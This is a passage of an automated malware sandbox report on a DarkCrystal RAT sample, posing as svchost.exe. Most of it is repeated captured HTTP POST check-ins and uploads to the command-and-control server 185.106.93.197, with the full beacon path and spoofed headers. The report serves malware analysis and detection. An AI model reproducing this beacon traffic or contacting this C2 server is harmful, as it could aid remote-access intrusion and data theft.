Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Code function: 0_2_0030B348 FindFirstFileExA, 0_2_0030B348
Source: C:\comref\svchost.exe Code function: 4x nop then jmp 00007FFAAB792656h 14_2_00007FFAAB78086A
Source: C:\comref\svchost.exe Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh 14_2_00007FFAAB93D4FD

Networking

barindex
Source: Network traffic Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49708 -> 185.106.93.197:80
Source: C:\comref\svchost.exe Network Connect: 185.106.93.197 80 Jump to behavior
Source: Joe Sandbox View ASN Name: SUPERSERVERSDATACENTERRU SUPERSERVERSDATACENTERRU
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 384Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1840Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1840Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1828Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1840Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1840Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1820Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: multipart/form-data; boundary=----3L6dFNpHggmEVePS1rn0L5vFbP6ztukNDZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 108894Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1820Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1844Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1844Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1832Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2504Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
